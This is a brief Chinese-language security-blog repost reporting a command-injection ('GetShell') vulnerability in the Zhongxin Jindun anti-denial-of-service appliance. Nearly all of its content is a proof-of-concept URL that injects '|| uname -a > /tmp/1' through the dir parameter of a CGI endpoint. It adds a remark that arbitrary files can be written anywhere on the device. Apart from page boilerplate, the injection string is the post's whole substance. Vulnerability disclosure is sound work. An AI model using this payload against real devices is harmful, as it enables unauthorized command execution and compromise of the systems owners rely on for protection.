中新金盾抗拒绝服务系统GetShell漏洞2

没穿底裤 2020年1月1日05:46:41评论627 views字数 156阅读0分31秒阅读模式
摘要

漏洞证明:
https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo


漏洞作者: Tea

漏洞证明:
https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo

命令:

uname -a > /tmp/1

写入到/tmp/1文件

可以写任意文件到任意目录,还愁啥?

中新金盾抗拒绝服务系统GetShell漏洞2

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:46:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   中新金盾抗拒绝服务系统GetShell漏洞2http://cn-sec.com/archives/75657.html

发表评论

匿名网友 填写信息